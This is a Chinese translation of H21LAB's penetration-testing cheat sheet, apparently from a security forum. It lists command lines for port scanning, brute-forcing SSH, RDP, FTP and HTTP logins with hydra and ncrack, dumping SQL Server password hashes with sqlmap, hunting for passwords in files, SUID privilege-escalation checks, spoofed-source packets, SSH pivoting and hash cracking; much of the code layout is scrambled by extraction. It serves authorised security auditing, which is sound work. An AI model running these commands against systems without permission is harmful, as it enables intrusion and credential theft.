-
-
[翻译]渗透测试备忘单
-
2022-10-17 17:31 13288
-
原文链接
作者:H21LAB
译者:阳春
翻译时间:2022/10/17
译者注:转载清注明作者、译者和出处
渗透测试备忘单
使用条款
日常渗透测试可以显著改善公司的安全状况。在进行任何安全审计之前,审计员应该从目标网络或者目标系统所有者那里获得必要的权限和允许。
剑其铸时必盼其有所用,作者不承担其被错用的责任。本文成文时亦盼其有所用,但是对此不作任何保证。
Linux安全审计命令集:
--------------------------远程网络命令--------------------------
有用的Linux系统网络命令
traceroute
1 | traceroute 8.8 . 8.8 |
nmap TCP syn扫描,使用脚本扫描所有TCP端口,可用于所有nmap输出格式
1 | nmap - sS - sV - sC - v - p - - oA all - tcp - 127.0 . 0.1 127.0 . 0.1 |
1 | nmap - sS - sV - A - v - p - - oA all - tcp - 127.0 . 0.1 127.0 . 0.1 |
nmap 反向DNS解析
1nmap
-
Pn
-
sn
-
R
-
oA dns
-
10.1
.
0.0_16
10.1
.
0.0
/
16
更新nmap脚本
1nmap
-
-
script
-
updatedb
枚举nmap脚本
1ls
-
la
/
usr
/
share
/
nmap
/
scripts
/
nmap暴力破解脚本
1nmap
-
vvv
-
-
script http
-
brute
-
-
script
-
args userdb
-
users.txt,passdb
-
pass
.txt
-
p <port> <host>
1nmap
-
-
script vmauthd
-
brute
-
p <port> <host>
1nmap
-
-
script ftp
-
brute
-
p <port> <host>
脚本帮助手册
1nmap
-
-
script
-
help
-
ssl
-
heartbleed
使用脚本扫描
1nmap
-
sV –script
=
ssl
-
heartbleed.nse
-
p <port> <host>
使用一组脚本扫描
1nmap
-
sV
-
-
script
=
smb
*
-
p <port> <host>
将nmap当作漏洞扫描器使用
1234mkdir
/
usr
/
share
/
nmap
/
scripts
/
vulscan
cd
/
usr
/
share
/
nmap
/
scripts
/
vulscan
git clone https:
/
/
github.com
/
scipag
/
vulscan.git
nmap
-
sV
-
-
script
=
vulscan
/
vulscan.nse
127.0
.
0.1
ncrack
1ncrack
-
vv
-
-
user root <host>:<port>
ncrack RDP
1ncrack
-
vv
-
U username.txt
-
P password.txt <host>:
3389
ncrack SSH
1ncrack
-
vv
-
-
user root <host>:
22
hydra
暴力破解SSH
1hydra
-
L <user
-
list
.txt>
-
P <password
-
list
.txt> ssh:
/
/
<host>
通过HTTP暴力破解IP路由
1hydra
-
V
-
l admin
-
P passwords.txt
-
t
36
-
f
-
s
80
192.168
.
1.1
http
-
get
/
1hydra
-
V
-
l admin
-
P passwords.txt
-
t
36
-
f
-
s
80
http
-
get:
/
/
192.168
.
1.1
:
8080
暴力破解FTP
1hydra
-
V
-
l admin
-
P passwords.txt
-
e ns
-
f
-
s
21
192.168
.
1.1
ftp
暴力破解RDP
1hydra
-
t
1
-
V
-
f
-
l username
-
P password.lst rdp:
/
/
192.168
.
1.1
skipfish
基础扫描
1skipfish
-
o out_dir https:
/
/
www.host.com
使用cookie访问需要认证页面
1skipfish
-
o out_dir
-
I urls_to_scan
-
X urls_not_to_scan
-
C cookie1
=
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
-
C cookie2
=
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX https:
/
/
www.host.com
wfuzz
URL暴力破解
1wfuzz
-
c
-
z
file
,Directories_Common.wordlist
-
-
hc
404
http:
/
/
<host>
/
FUZZ.php
GET参数暴力破解
1wfuzz
-
c
-
z
file
,users.txt
-
z
file
,
pass
.txt
-
-
hc
404
http:
/
/
<host>
/
index.php?user
=
FUZZ&
pass
=
FUZ2Z
sqlmap
1 2 3 4 5 6 | sqlmap - u "http://host.com/vulnerable.php?param=12345" sqlmap - u "http://host.com/vulnerable.php?param=12345" - - dbms "Microsoft SQL Server" - - sql - query = "select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins sqlmap - u "http://host.com/vulnerable.php?param=12345" - - dbms "Microsoft SQL Server" - - dbs sqlmap - u "http://host.com/vulnerable.php?param=12345" - - dbms "Microsoft SQL Server" - - dump - D database - T table sqlmap - u "http://host.com/vulnerable.php?param=12345" - - cookie "cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" sqlmap - r POST.txt - p field |
MySQL
1 2 | mysql - u <username> - p - - port <port> - h <host> mysqldump - h <host> - u <username> - p - f - - port <port> - - events - - routines - - triggers - - all - databases > MySQLData.sql |
Oracle
1 | sqlplus "username/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=hostname)(PORT=port))(CONNECT_DATA=(SERVER=dedicated)(SERVICE_NAME=servicename)))" |
sqlplus 命令
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 | # 改善sqlplus命令行输出 SET PAGESIZE 50000 ; # 列举表空间 SELECT TABLESPACE_NAME FROM USER_TABLESPACES; # 列举所有表 SELECT owner, table_name FROM dba_tables; # 查找具有给定列名的表 SELECT owner, table_name, column_name FROM all_tab_columns WHERE UPPER(column_name) = UPPER( 'PASSWORD' ); SELECT owner, table_name, column_name FROM all_tab_columns WHERE UPPER(column_name) LIKE '%PASS%' ; # 给定列名查找表并计算行数 SET SERVEROUTPUT ON DECLARE val NUMBER; BEGIN FOR I IN (SELECT DISTINCT owner, table_name FROM all_tab_columns WHERE UPPER(column_name) LIKE '%PASS%' ) LOOP EXECUTE IMMEDIATE 'SELECT count(*) FROM ' || i.owner || '.' || i.table_name INTO val; DBMS_OUTPUT.PUT_LINE(i.owner || '.' || i.table_name || ' ==> ' || val ); END LOOP; END; / # 查找数据库中所有NVARCHAR2类型的列 SET SERVEROUTPUT ON SIZE 100000 DECLARE match_count INTEGER; BEGIN FOR t IN (SELECT owner, table_name, column_name FROM all_tab_columns WHERE owner <> 'SYS' and data_type LIKE 'NVARCHAR2' ) LOOP EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM ' || t.owner || '.' || t.table_name || ' WHERE ' ||t.column_name|| ' = :1' INTO match_count USING 'SEARCH_TEXT' ; IF match_count > 0 THEN dbms_output.put_line( t.table_name || ' ' ||t.column_name|| ' ' ||match_count ); END IF; END LOOP; END; / |
Postgres
1 | psql - h 127.0 . 0.1 db_name username |
SNMP
SNMPv1
123snmpwalk
-
mALL
-
v1
-
cpublic <host>
snmpwalk
-
mALL
-
v1
-
cprivate <host>
snmpget
-
mALL
-
v1
-
cpublic <host> sysName.
0
SNMPv2
1234snmpwalk
-
v2c
-
cprivate <host>:<port>
snmpget
-
v2c
-
cprivate
-
mALL <host> sysName.
0
sysObjectID.
0
ilomCtrlDateAndTime.
0
snmpset
-
mALL
-
v2c
-
cprivate <host> ilomCtrlHttpEnabled.
0
i
1
SUN
-
ILOM
-
CONTROL
-
MIB::ilomCtrlHttpEnabled.
0
=
INTEGER: true(
1
)
SNMPv3
1snmpwalk
-
v3
-
l authPriv
-
u snmpadmin
-
a MD5
-
A PaSSword
-
x DES
-
X PRIvPassWord <host>:<port> system
LDAP
1 2 3 4 5 6 7 8 9 10 11 12 13 | ldapsearch - x - b "dc=company,dc=com" - s base - h <host> LDAPTLS_REQCERT = never ldapsearch - x - D "uid=Name.Surname,OU=People,DC=Company,DC=com" - W - H ldaps: / / <host> - b "uid=Name.Surname,OU=People,DC=Company,DC=com" - s sub ldapsearch - x - p 389 - h "127.0.0.1" - b "ou=people,dc=company,dc=com" - s sub "objectClass=*" ldapsearch - x - p 1389 - h "127.0.0.1" - b "dc=company,dc=com" - s one "objectClass=*" ldapmodify - a - h "127.0.0.1" - p 389 - D "cn=Directory Manager" - w 'password' - f modify.ldif dn: ou = people,dc = company,dc = com objectClass: top objectClass: organizationalunit ou: people ... ldap delete - x - D "cn=Directory Manager" - w 'password' - p 1389 - h "127.0.0.1" "uid=identifier,ou=people,dc=company,dc=com" |
Redis
1 | redis - cli dbsize |
NFS
1 2 | showmount - e 127.0 . 0.1 mount - o ro 127.0 . 0.1 : / / mnt / nfs |
SIP
svmap, 发送SIP选项
1svmap
-
p5060,
5061
,
5080
-
5090
10.0
.
0.1
svcrack
1svcrack
-
u100
-
d dictionary.txt
10.0
.
0.1
SMB
1 2 | smbclient - L <host> - N smbclient / / <host> / < dir > - N |
SSHFS
redir
1 | redir - - laddr = <listen_address> - - lport = <listen_port> - - caddr = <connect_address> - - cport = <connect_port> |
发送HTTP post请求
1 | curl - - data "param1=value1¶m2=value2" https: / / host.com / index.php |
用nc发送SOAP请求
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | #!/bin/sh HOST = host.com PORT = 8888 nc $HOST $PORT << __EOF__ POST / services / HTTP / 1.1 Host: host.com: 8888 Content - Type : text / xml;charset = UTF - 8 SOAPAction: "" <soapenv:Envelope xmlns:soapenv = "http://schemas.xmlsoap.org/soap/envelope/" xmlns:web = "http://host.com/" > <soapenv:Header / > <soapenv:Body> <web:soapRequest> < / web:soapRequest> < / soapenv:Body> < / soapenv:Envelope> __EOF__ |
使用curl发送soap请求
1 2 3 4 5 6 7 8 9 10 11 | $ proxychains curl - - header "Content-Type: text/xml;charset=UTF-8" - - header "SOAPAction:" - - data @data.xml http: / / 127.0 . 0.1 : 8888 / $ cat data.xml <?xml version = "1.0" encoding = "UTF-8" ?> <soapenv:Envelope xmlns:soapenv = "http://schemas.xmlsoap.org/soap/envelope/" xmlns:web = "http://host.com/" > <soapenv:Header / > <soapenv:Body> <web:soapRequest> < / web:soapRequest> < / soapenv:Body> < / soapenv:Envelope> |
使用nping发送payload,伪造源IP
1 | sudo nping - c 1 - - data hexstring - - udp - p dest_port - S source_ip - g source_port dest_ip |
bash分组,类似SQL group by
1 | cat test.txt | sort | uniq - c | sort - n |
通过SSH使用Wireshark
1 2 | ssh root@ 192.168 . 1.1 "sudo tcpdump -U -s0 -i lo -w - 'not port 22'" | wireshark - k - i - wireshark - k - i <(ssh root@ 192.168 . 1.1 tcpdump - U - s0 - i any - w - not port 22 ) |
HEX转PCAP
1 | xxd - r - p test. hex | od - Ax - tx1 | text2pcap - test.pcap |
解析JSON
1 | grep - Po '"field" : .*?[^\\]",' test.json |
tshark将过滤结果保存到文件
1 | tshark - r input .pcap - Y "ip.src == 10.1.1.1" - w output.pcap - F pcap |
john the ripper 显卡计算, OpenCL格式, 启动会话
1 | john - - session = session_name - - format = opencl ~ / hash .txt |
john the ripper 列举显卡OpenCL格式
1john
-
-
list
=
formats
-
-
format
=
opencl
john the ripper 继续会话
1john
-
-
restore
=
session_name
john the ripper 显示破解的密码
1john ~
/
hash
.txt
-
-
show
dynamic格式
edit john/JohnTheRipper/run/dynamic.conf
1john
-
-
fork
=
16
-
-
session
=
session_dynamic
-
-
format
=
dynamic_xxxx
hash
.txt
--------------------------本地命令--------------------------
有用的Linux系统本地命令
快速分析系统,可能有助于提升权限
在连接到远程系统之前,启用日志记录会话交互内容。仅在类似ssh连接之后执行。
1 | script <filename> |
登录
1 | ssh username@hostname |
检查当前shell
1 | echo $ 0 |
检查当前用户
1 | whoami |
检查系统
1 | uname - a |
检查系统启动时间
``bash
uptime```
检查系统变量
1 | export |
检查进程
1 2 3 | ps - ef ps auxf ps auxfww |
搜索文件
1 2 3 | find . - name "*.java" - type f - exec fgrep - iHn "textToFind" {} \; find . - regex ".*\.\(c\|java\)" - type f - exec fgrep - iHn "textToFind" {} \; find / - maxdepth 4 - name * .conf - type f - exec grep - Hn "textToFind" {} \; 2 > / dev / null |
root用户拥有的SUID文件
1find
/
-
uid
0
-
perm
-
4000
-
type
f
2
>
/
dev
/
null
全局可读的root用户拥有的SUID文件
1find
/
-
uid
0
-
perm
-
u
=
s,o
=
r
-
type
f
-
exec
ls
-
la {} \;
2
>
/
dev
/
null
SUID文件
1find
/
-
perm
-
4000
-
type
f
2
>
/
dev
/
null
全局可写目录
1find
/
-
perm
-
2
-
type
d
2
>
/
dev
/
null
搜索文件中的密码,忽略错误,滤出proc和其他文件夹
12find . !
-
path
"*/proc/*"
-
type
f
-
name
"*"
-
exec
fgrep
-
iHn password {} \;
find .
-
type
f \(
-
iname \
*
.conf
-
o
-
iname \
*
.cfg
-
o
-
iname \
*
.xml
-
o
-
iname \
*
.ini
-
o
-
iname \
*
.json
-
o
-
iname \
*
.sh
-
o
-
iname \
*
.pl
-
o
-
iname \
*
.py \)
-
exec
fgrep
-
iHn password {} \;
2
>
/
dev
/
null
使用一些正则特征搜索(正则特征按行分)
1find .
-
type
f
-
exec
grep
-
iHFf patterns.txt {} \;
在小文件中搜索密码
1find .
-
type
f
-
size
-
512k
-
exec
fgrep
-
iHn password {} \;
逆向java jar文件,在其中搜索密码
1find .
-
name
"*.jar"
-
type
f
-
exec
~
/
jd
-
cli
/
jd
-
cli
-
oc
-
l
-
n
-
st {} \; | egrep
-
i
-
e
"Location:"
-
e
"password"
| uniq
检查开放端口和监听端口的服务
1 | netstat - anp |
检查自定义hosts
1 | cat / etc / hosts |
检查本地IP地址和网口
1 | ifconfig - a |
检查路由
1 | route - v |
检查文件系统
1 | $ df |
检查sudo特权
1 | sudo - l |
检查定时任务
1 | crontab - l |
检查启动任务
1 | cat / etc / inittab |
尝试嗅探流量
1 2 | tcpdump tcpdump - s0 not port 22 - w trace.pcap |
检查已知服务器公钥
1 | cat ~ / .ssh / known_hosts |
尝试访问邮件
1 | head / var / mail / root |
列举用户组和用户
1 2 | cat / etc / group cat / etc / passwd |
检查共享内存
1 | ipcs - mp |
登出
1 | logout |
关闭脚本会话
1 | Ctrl + D |
--------------------------SSH隧道和链路--------------------------
有助于在不同机器间跳转和隧道
SSH代理命令
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | ssh config (~ / .ssh / config) Host _first_server Hostname XXX.XXX.XXX.XX Port 22 User root Host _second_server Hostname 127.0 . 0.1 Port 22 User root # password is "XXXXXXX" ProxyCommand ssh - v - W 127.0 . 0.1 : 22 _first_server Host _third_server Hostname XXX.XXX.XXX.XXX Port 22 User XXXXX ProxyCommand ssh _second_server - W % h: % p Host _host_over_sshpass and ssh key Hostname XXX.XXX.XXX.XXX IdentityFile id_rsa User XXXXX ProxyCommand sshpass - pXXXXXXX ssh - Fssh_config _host_previous_in_chain - W % h: % p |
代理链
在后台执行ssh,不执行命令
12ssh
-
f
-
N
-
D
9050
user@host
proxychains telnet hosts
使用本地SSH隧道在远端服务器上访问web服务器
1sudo ssh
-
F ~
/
.ssh
/
ssh_config _host_definition
-
L
127.0
.
0.1
:
8080
:
127.0
.
0.1
:
8080
-
L
127.0
.
0.1
:
8443
:
127.0
.
0.1
:
8443
torsocks
1torsocks sshpass
-
p
'********'
ssh
-
C admin@XXX.XXX.XXX.XXX
"sudo tcpdump -i any -U -s0 -w - 'not port 22'"
| wireshark
-
k
-
i
-
允许通过互联网及远端服务器访问本地服务器(反向SSH隧道,内网穿透)
1234sudo apt install tinyproxy
sudo systemctl disable tinyproxy
sudo systemctl stop tinyproxy
sudo vi
/
etc
/
tinyproxy
/
tinyproxy.conf
配置监听端口(例如端口3128)
1sudo systemctl start tinyproxy
123ssh
-
R
3128
:
127.0
.
0.1
:
3128
host
$ export http_proxy
=
http:
/
/
127.0
.
0.1
:
3128
$ export https_proxy
=
http:
/
/
127.0
.
0.1
:
3128
--------------------------反编译工具--------------------------
jd-gui (Java 反编译器)
1 2 | cd ~ / Decompilers / Java / java - jar jd - gui - 1.6 . 2.jar |
ghidra (C 反编译器)
1 | ~ / Decompilers / ghidra_9. 0.4 / ghidraRun |
ffdec (Flash 反编译器)
1 2 3 4 5 6 7 8 9 10 11 12 13 | sudo update - alternatives - - config java There are 2 choices for the alternative java (providing / usr / bin / java). Selection Path Priority Status - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 / usr / lib / jvm / java - 11 - openjdk - amd64 / bin / java 1111 auto mode * 1 / usr / lib / jvm / java - 10 - openjdk - amd64 / bin / java 1 manual mode 2 / usr / lib / jvm / java - 11 - openjdk - amd64 / bin / java 1111 manual mode Press <enter> to keep the current choice[ * ], or type selection number: ~ / Decompilers / Flash / ffdec_11. 2.0_nightly1721 . / ffdec.sh |
--------------------------辅助工具--------------------------
使用rsync通过ssh压缩并复制文件
1 | rsync - - append - verify - avhzpP - e ssh user@host: / source / * dest |
rsync本地复制,完全同步,抹除已删除文件
1 | rsync - - append - verify - avhepP - - delete / source / * dest |
在csv文件里grep
1 | cat some.csv | awk - F, '$3 == value {print}' |
搜索特定日期的文件
1 | find . - type f - newermt "YYYY-MM-D1" ! - newermt "YYYY-MM-D2" |
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2022-10-17 17:32
被阳春编辑
,原因: typo
赞赏
他的文章
看原图